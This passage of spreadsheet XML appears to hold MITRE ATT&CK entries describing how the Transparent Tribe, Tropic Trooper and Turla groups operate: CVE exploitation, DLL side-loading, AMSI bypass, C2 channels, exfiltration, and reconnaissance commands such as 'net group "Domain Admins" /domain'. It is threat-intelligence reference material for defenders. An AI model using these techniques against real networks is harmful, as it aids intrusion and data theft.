    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has compromised domains for use in targeted malicious campaigns.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--2a27a98e-ee19-49f3-96e4-a5c9ee6e65ed</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</si>
  <si>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</si>
  <si>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relationship--02fa0350-978f-4b61-b004-82380e70beee</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</si>
  <si>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</si>
  <si>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relationship--087c222c-4108-4fbf-ac8f-983cd71548fa</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used dynamic DNS services to set up C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--23041edc-3136-49b7-8d08-311321455aa7</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--9553062d-2207-4990-b9d4-a29f75628bd5</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) can hide legitimate directories and replace them with malicious copies of the same name.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--88f1dfcb-3b2a-494d-bab2-027602c4f78f</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</si>
  <si>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</si>
  <si>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relationship--13189e47-4ae9-49ea-8c0f-605177626ada</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has directed users to open URLs hosting malicious content.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>relationship--b4824825-f732-44d9-a088-3ce222c0f751</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) can mimic legitimate Windows directories by using the same icons and names.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--4d1b4d28-84c8-4ae4-9e04-c437dc391eac</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has dropped encoded executables on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--17087e76-4d84-443e-8fb1-0ec6498681db</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</si>
  <si>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</si>
  <si>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relationship--b43dfc0c-beca-45c0-bb47-5b57a6acada9</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has embedded links to malicious downloads in e-mails.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>relationship--4364b7ab-fd25-4145-84e6-e9e74ac3c0dd</t>
  </si>
  <si>
    <t xml:space="preserve">[Transparent Tribe](https://attack.mitre.org/groups/G0134) has crafted VBS-based malicious documents.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)	 </t>
  </si>
  <si>
    <t>relationship--312f53be-d610-4c7c-af9b-44148c07bf7e</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--6a8356c2-5a79-40b7-bb8e-b7d9dffbe523</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has collected information automatically using the adversary's [USBferry](https://attack.mitre.org/software/S0452) attack.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--b3dd4e4e-0bb8-4487-8336-b5d9024045eb</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--c4f1371c-8f23-49b7-9572-d226ee2dbade</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: Anomali Pirate Panda April 2020)</t>
  </si>
  <si>
    <t>relationship--77dbc1ae-556e-43cd-b776-c7670ab5c915</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor has communicated to the C2 over the DNS protocol.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--af9e92df-d4d0-437a-9114-823b6a2a14a6</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</si>
  <si>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</si>
  <si>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relationship--d68120b8-9ef8-4a40-ae4c-d2b597336140</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into dllhost.exe and svchost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--c31643e8-86a3-49e4-bd69-572d7e64c7c0</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted traffic with the C2 to prevent network detection.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--3089fe6b-36d6-4890-b70b-1a76f55c84ff</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has exfiltrated data using USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--6971d7f3-8161-4399-b587-acab5d8820f1</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>relationship--ad934b01-9c8c-42cd-8195-dc272c363208</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has deleted dropper files on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--098a760a-66ce-46e0-938e-86518e450a27</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has monitored files' modified time.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--78731c00-1f22-4dab-a3cd-d19fac57e82f</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under &lt;code&gt;C:\ProgramData\Apple\Updates\&lt;/code&gt; and &lt;code&gt;C:\Users\Public\Documents\Flash\&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--4269342d-fd7b-4fc6-882f-5099da627c85</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--0f47a6e7-af7e-4e23-a401-4dec08da4e64</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used known administrator account credentials to execute the backdoor directly.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--95122d43-9de8-4eef-bc46-6fdc5cc276a9</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has lured victims into executing malware via malicious e-mail attachments.(Citation: Anomali Pirate Panda April 2020)</t>
  </si>
  <si>
    <t>relationship--283ba7b1-cd3b-44e9-bfae-70023c53d446</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has hidden payloads in Flash directories and fake installer files.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--8a2a70a5-044d-4869-9d11-10499c8848bc</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--73499911-3b9f-443e-b522-f0d1434f2eb6</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;pr&lt;/code&gt; and an openly available tool to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--5929ef3e-3945-4ede-b3cd-94f47850a6bd</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;netview&lt;/code&gt; to scan target systems for shared resources.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--c4f4fe39-af57-47d3-8428-fe5bce63bdbb</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--86333028-9eb1-44a3-9a5a-51fffe66f0e1</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) is capable of enumerating the running processes on the system using &lt;code&gt;pslist&lt;/code&gt;.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--17cafa26-57f1-4efb-9d23-1399cd2de4cd</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created shortcuts in the Startup folder to establish persistence.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--69cc4413-80b4-45ed-a993-db34fe32fabe</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has attempted to transfer [USBferry](https://attack.mitre.org/software/S0452) from an infected USB device by copying an Autorun function to the target machine.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--fded4f08-6cb0-4259-a6a9-f0d62537164f</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) can search for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>relationship--cdefab78-5d90-4e89-8664-5bbd30ab1517</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor could list the infected system's installed software.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--f79c163a-25c0-4694-b1ca-50ab1eda8651</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</si>
  <si>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</si>
  <si>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relationship--0be962d8-6281-4554-ad1f-4cba04c547de</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used base64 encoding to hide command strings delivered from the C2.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--91180074-16cd-448f-8955-628d06965e22</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--e35f5636-2ae8-4ab7-9851-73410e6a58d0</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system’s OS version and system volume information.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--cd5799f3-8be5-4272-88db-626940136130</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used scripts to collect the host's network topology.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--6512ebc3-cc9f-48e1-9a57-a5deb062f123</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has tested if the localhost network is available and other connection capability on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--df7e5314-665b-44a3-8040-f6cb8fd28cbf</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;letmein&lt;/code&gt; to scan for saved usernames on the target system.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--58a7f0d9-7c20-4808-b8be-bd6240267030</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>relationship--56a866fd-1a37-4750-89e6-2e26ed69cb27</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--32bebd4b-6bbe-4a4e-86a1-0c49fda51259</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has started a web service in the target host and wait for the adversary to connect, acting as a web shell.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--6a063d3a-cad2-4649-93a4-d1931ae6aaaf</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used Windows command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--702b125c-993e-468f-8ea9-6862048be772</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has installed a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--03fcc016-f9a2-491d-8d9f-92aa4b4c4d4a</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</si>
  <si>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</si>
  <si>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relationship--ad3bca07-c2d2-411f-9bd8-bf4e1142d9ae</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has encrypted files stolen from connected USB drives into a RAR file before exfiltration.(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--931c0864-0b91-46b7-bdc0-0360777d95a6</t>
  </si>
  <si>
    <t>A [Turla](https://attack.mitre.org/groups/G0010) JavaScript backdoor has used Google Apps Script as its C2 server.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>relationship--7fcd4b9b-87e3-4e8c-abde-84639c85467f</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) may attempt to connect to systems within a victim's network using &lt;code&gt;net use&lt;/code&gt; commands and a predefined list or collection of passwords.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--5682d524-80f0-4fd8-9960-6f54eeafce96</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has modified variables in kernel memory to turn off Driver Signature Enforcement after exploiting vulnerabilities that obtained kernel mode privileges.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>relationship--d3d8b77f-d830-4f61-aa2e-bec783fc84f4</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</si>
  <si>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</si>
  <si>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relationship--ae6620d4-5320-4e5a-a61a-5bda4ac1c9e4</t>
  </si>
  <si>
    <t>19 June 2019</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can impersonate or steal process tokens before executing commands.(Citation: ESET Turla PowerShell May 2019)	</t>
  </si>
  <si>
    <t>relationship--0ebd9fb8-a6d0-4b91-bada-c5e5c79b0808</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used a custom .NET tool to collect documents from an organization's internal central database.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--b3e2abaa-f431-4791-95d0-d44f3a74a73f</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can upload files from victim machines.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--500c4228-b676-4f47-a391-9e52abd5ea51</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can collect files from USB thumb drives.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--ad2efb21-6884-422f-8e89-fc0b1d2dcbb0</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</si>
  <si>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</si>
  <si>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relationship--07516f04-c7aa-46c7-9cca-0f81b84043e2</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--10987149-1b3f-4c89-a1e6-c285d740697f</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net user /domain&lt;/code&gt; to enumerate domain accounts.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--689d5a99-cfcf-43d6-ae55-9bf920986f63</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net group "Domain Admins" /domain&lt;/code&gt; to identify domain administrators.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--bcd2cfa1-793c-40a7-9920-614539e651a7</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has infected victims using watering holes.(Citation: ESET ComRAT May 2020)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>relationship--5e8f23be-48b6-4236-9475-89f11e769ee6</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used Metasploit to perform reflective DLL injection in order to escalate privileges.(Citation: ESET Turla Mosquito May 2018)(Citation: Github Rapid7 Meterpreter Elevate)</t>
  </si>
  <si>
    <t>relationship--1a978832-f04d-4853-8094-58fc99e30ed1</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also exfiltrated stolen files to OneDrive and 4shared.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--7dda2468-0344-48c5-8843-6655084d8159</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.(Citation: Unit42 AcidBox June 2020)</t>
  </si>
  <si>
    <t>relationship--3185e611-cec6-4910-aa64-efd8fafe1072</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</si>
  <si>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</si>
  <si>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relationship--fa6292a2-c184-4bc9-a37f-0c1ac61e1135</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used the Registry to store encrypted and encoded payloads.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--bd437a82-65df-42d7-a73b-6ed63a4cdd63</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover Group Policy details using the &lt;code&gt;gpresult&lt;/code&gt; command.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--33214d7f-0c78-4905-8ab0-8a6b6eb20eeb</t>
  </si>
  <si>
    <t>09 August 2021</t>
  </si>
  <si>
    <t>Based on comparison of [Gazer](https://attack.mitre.org/software/S0168) versions, [Turla](https://attack.mitre.org/groups/G0010) made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used shellcode to download Meterpreter after compromising a victim.(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>relationship--20b90b04-4ce1-4e9a-9dbb-9fc93569d3e1</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has compromised internal network systems to act as a proxy to forward traffic to C2.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--8eafddf4-a5ae-43a0-8129-966de05fefb0</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;tracert&lt;/code&gt; to check internet connectivity.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--e0aaa143-5c5f-4c58-8ace-d05b037bf4b6</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) has used various JavaScript-based backdoors.(Citation: ESET Turla Mosquito Jan 2018)	</t>
  </si>
  <si>
    <t>relationship--0c4e4578-3bb1-4c9a-9dc8-af3b7368ada9</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can be used to transfer files to/from victim machines on the local network.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--56ad8893-2933-4b3b-a84d-026d9afb7dcb</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net user&lt;/code&gt; to enumerate local accounts on the system.(Citation: ESET ComRAT May 2020)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--8a47e81d-be1f-488c-8136-40e18c70d45f</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has abused local accounts that have the same password across the victim’s network.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--f4268a0d-0539-46de-bad8-ea72af455585</t>
  </si>
  <si>
    <t>09 December 2020</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net localgroup&lt;/code&gt; and &lt;code&gt;net localgroup Administrators&lt;/code&gt; to enumerate group information, including members of the local administrators group.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--059cc1e2-9570-4760-8137-d3d71b66bb78</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used multiple backdoors which communicate with a C2 server via email attachments.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--3632ab1c-caa3-4d65-a665-7da325f4b7ac</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used spearphishing via a link to get users to download and run their malware.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--8be8b96b-b69c-497a-8b38-308b8bd291ff</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has developed its own unique malware for use in operations.(Citation: Recorded Future Turla Infra 2020)</t>
  </si>
  <si>
    <t>relationship--a8cfb738-65ac-4d5a-8ef7-d3a21eab02ea</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used malware obtained after compromising other threat actors, such as [OilRig](https://attack.mitre.org/groups/G0049).(Citation: NSA NCSC Turla OilRig)(Citation: Recorded Future Turla Infra 2020)</t>
  </si>
  <si>
    <t>relationship--ba6536dd-2c36-4057-bae9-e71e1076e69b</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has modify Registry values to store payloads.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--052be04b-5ff3-4757-a5c1-de012997accc</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--3465231b-93b2-47ea-8c4f-f1f7e9d9be1b</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; to acquire password policy information.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--f946b4f9-a18e-4a1e-856c-2c215f78f8be</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;fsutil fsinfo drives&lt;/code&gt; to list connected drives.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--7dd2714d-aa8a-40ce-bae1-98634090ac01</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</si>
  <si>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</si>
  <si>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relationship--ada9885f-276a-4f97-859d-1bb9f73b58c1</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used PowerShell profiles to maintain persistence on an infected machine.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--18983529-5998-4f76-be90-f6e9cdd9f33d</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</si>
  <si>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</si>
  <si>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relationship--9dfb7899-20af-4eea-bfca-f608d885cb00</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</si>
  <si>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</si>
  <si>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relationship--f3055d9f-986e-4202-bb13-c956069bb43f</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have included local UPnP RPC proxies.(Citation: ESET Turla PowerShell May 2019)	</t>
  </si>
  <si>
    <t>relationship--2e162cdf-e917-4bc5-a2d2-1623e05d0b61</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used IronPython scripts as part of the [IronNetInjector](https://attack.mitre.org/software/S0581) toolchain to drop payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--afea3455-9565-4e5d-b431-e845ec1722d2</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</si>
  <si>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</si>
  <si>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relationship--519c4c7f-8495-4b8a-b58e-551a78e469cc</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</si>
  <si>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</si>
  <si>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relationship--4f2450a7-d2d2-4063-9dd5-cac396a3215c</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</si>
  <si>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</si>
  <si>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relationship--b8a1739d-240b-46c1-a25a-b82d1c4e4765</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) used &lt;code&gt;net use&lt;/code&gt; commands to connect to lateral systems within a network.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--4a6248d4-4fa1-404a-abed-84e9b7c32dbe</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has obtained information on security software, including security logging information that may indicate whether their malware has been detected.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--ad8d3784-2eea-47b4-b13d-d16d0211acf3</t>
  </si>
  <si>
    <t>06 July 2020</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used compromised servers as infrastructure.(Citation: Recorded Future Turla Infra 2020)(Citation: Accenture HyperStack October 2020)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--65eac98e-82b8-4592-a121-bea99f80dc87</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--d42b9304-293a-4b95-a946-dcda81be5c87</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;set&lt;/code&gt; commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--e2675622-ec8e-4894-9f5e-3c82944e3019</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</si>
  <si>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</si>
  <si>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relationship--9eefeafd-aca1-4e4c-8d29-ea6f9154808a</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</si>
  <si>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</si>
  <si>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relationship--3325e625-d76b-42df-b952-749dabb57517</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running services and associated processes using the &lt;code&gt;tasklist /svc&lt;/code&gt; command.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--52c18ed1-91a5-4394-a4d0-f700c75bf3d9</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover the system time by using the &lt;code&gt;net time&lt;/code&gt; command.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--87b74ba7-99c4-464c-86d2-1dd8c8b578b1</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has obtained and customized publicly-available tools like [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--0b512662-8eb8-424d-99c5-4f76d1d70276</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used the VPS infrastructure of compromised Iranian threat actors.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>relationship--e424b236-8c54-482b-b390-a15345f5c35c</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) has used VBS scripts throughout its operations.(Citation: Symantec Waterbug Jun 2019)	</t>
  </si>
  <si>
